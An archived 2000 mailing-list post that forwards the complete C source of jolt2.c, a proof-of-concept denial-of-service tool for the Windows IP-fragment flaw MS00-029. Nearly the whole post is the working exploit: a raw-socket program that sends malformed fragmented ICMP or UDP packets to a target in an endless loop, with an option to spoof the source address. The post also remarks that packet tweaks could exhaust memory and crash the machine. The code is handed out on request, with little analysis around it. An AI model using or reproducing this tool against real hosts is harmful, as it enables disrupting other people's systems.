Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

FW: Windows DoS code (jolt2.c) (fwd)

From: marc () EEYE COM (Marc)
Date: Thu, 25 May 2000 13:33:34 -0700

Someone was asking for this a few days ago... so here it is.

Signed,
Marc Maiffret
Chief Hacking Officer
eCompany / eEye
T.949.675.8194
F.949.675.8294
http://eEye.com

| -----Original Message-----
| From: Windows NTBugtraq Mailing List
| [mailto:NTBUGTRAQ () LISTSERV NTBUGTRAQ COM]On Behalf Of Phonix Monkey
| Sent: Thursday, May 25, 2000 8:42 AM
| To: NTBUGTRAQ () LISTSERV NTBUGTRAQ COM
| Subject: Windows DoS code (jolt2.c) (fwd)
|
|
| This is code for the new DoS discovered by Razor a few days ago.  It
| forces cpu utilization to 100%, making everything move really really
| slow.  Tested against Win98, WinNT4/sp5,6, Win2K.
|
| An interesting side note is that minor changes to this packet cause
| NT4/Win2k (maybe others, not tested) memory use to jump
| *substantially* (+70 meg non-paged-pool on a machine with 196 mb
| phys).  There seems to be a hard upper limit, but on machines with smaller
| amounts of memory or smaller swapfiles, ramping up the non-paged-pool this
| much might lead to a BSOD.
|
| .phonix.
|
|
|
|
| /*
|  * File:   jolt2.c
|  * Author: Phonix <phonix () moocow org>
|  * Date:   23-May-00
|  *
|  * Description: This is the proof-of-concept code for the
|  *              Windows denial-of-serice attack described by
|  *              the Razor team (NTBugtraq, 19-May-00)
|  *              (MS00-029).  This code causes cpu utilization
|  *              to go to 100%.
|  *
|  * Tested against: Win98; NT4/SP5,6; Win2K
|  *
|  * Written for: My Linux box.  YMMV.  Deal with it.
|  *
|  * Thanks: This is standard code.  Ripped from lots of places.
|  *         Insert your name here if you think you wrote some of
|  *         it.  It's a trivial exploit, so I won't take credit
|  *         for anything except putting this file together.
|  */
|
| #include <stdio.h>
| #include <string.h>
| #include <netdb.h>
| #include <sys/socket.h>
| #include <sys/types.h>
| #include <netinet/in.h>
| #include <netinet/ip.h>
| #include <netinet/ip_icmp.h>
| #include <netinet/udp.h>
| #include <arpa/inet.h>
| #include <getopt.h>
|
| struct _pkt
| {
|   struct iphdr    ip;
|   union {
|     struct icmphdr  icmp;
|     struct udphdr   udp;
|   }  proto;
|   char data;
| } pkt;
|
| int icmplen  = sizeof(struct icmphdr),
|     udplen   = sizeof(struct udphdr),
|     iplen    = sizeof(struct iphdr),
|     spf_sck;
|
| void usage(char *pname)
| {
|   fprintf (stderr, "Usage: %s [-s src_addr] [-p port] dest_addr\n",
|            pname);
|   fprintf (stderr, "Note: UDP used if a port is specified,
| otherwise ICMP\n");
|   exit(0);
| }
|
| u_long host_to_ip(char *host_name)
| {
|   static  u_long ip_bytes;
|   struct hostent *res;
|
|   res = gethostbyname(host_name);
|   if (res == NULL)
|     return (0);
|   memcpy(&ip_bytes, res->h_addr, res->h_length);
|   return (ip_bytes);
| }
|
| void quit(char *reason)
| {
|   perror(reason);
|   close(spf_sck);
|   exit(-1);
| }
|
| int do_frags (int sck, u_long src_addr, u_long dst_addr, int port)
| {
|   int     bs, psize;
|   unsigned long x;
|   struct  sockaddr_in to;
|
|   to.sin_family = AF_INET;
|   to.sin_port = 1235;
|   to.sin_addr.s_addr = dst_addr;
|
|   if (port)
|     psize = iplen + udplen + 1;
|   else
|     psize = iplen + icmplen + 1;
|   memset(&pkt, 0, psize);
|
|   pkt.ip.version = 4;
|   pkt.ip.ihl = 5;
|   pkt.ip.tot_len = htons(iplen + icmplen) + 40;
|   pkt.ip.id = htons(0x455);
|   pkt.ip.ttl = 255;
|   pkt.ip.protocol = (port ? IPPROTO_UDP : IPPROTO_ICMP);
|   pkt.ip.saddr = src_addr;
|   pkt.ip.daddr = dst_addr;
|   pkt.ip.frag_off = htons (8190);
|
|   if (port)
|   {
|     pkt.proto.udp.source = htons(port|1235);
|     pkt.proto.udp.dest = htons(port);
|     pkt.proto.udp.len = htons(9);
|     pkt.data = 'a';
|   } else {
|     pkt.proto.icmp.type = ICMP_ECHO;
|     pkt.proto.icmp.code = 0;
|     pkt.proto.icmp.checksum = 0;
|   }
|
|   while (1) {
|     bs = sendto(sck, &pkt, psize, 0, (struct sockaddr *) &to,
|               sizeof(struct sockaddr));
|   }
|   return bs;
| }
|
| int main(int argc, char *argv[])
| {
|   u_long  src_addr, dst_addr;
|   int i, bs=1, port=0;
|   char hostname[32];
|
|   if (argc < 2)
|     usage (argv[0]);
|
|   gethostname (hostname, 32);
|   src_addr = host_to_ip(hostname);
|
|   while ((i = getopt (argc, argv, "s:p:h")) != EOF)
|   {
|     switch (i)
|     {
|       case 's':
|         dst_addr = host_to_ip(optarg);
|         if (!dst_addr)
|           quit("Bad source address given.");
|         break;
|
|       case 'p':
|         port = atoi(optarg);
|         if ((port <=0) || (port > 65535))
|           quit ("Invalid port number given.");
|         break;
|
|       case 'h':
|       default:
|         usage (argv[0]);
|     }
|   }
|
|   dst_addr = host_to_ip(argv[argc-1]);
|   if (!dst_addr)
|     quit("Bad destination address given.");
|
|   spf_sck = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
|   if (!spf_sck)
|     quit("socket()");
|   if (setsockopt(spf_sck, IPPROTO_IP, IP_HDRINCL, (char *)&bs,
|       sizeof(bs)) < 0)
|     quit("IP_HDRINCL");
|
|   do_frags (spf_sck, src_addr, dst_addr, port);
| }
|
Previous By Date Next
Previous By Thread Next

Current thread: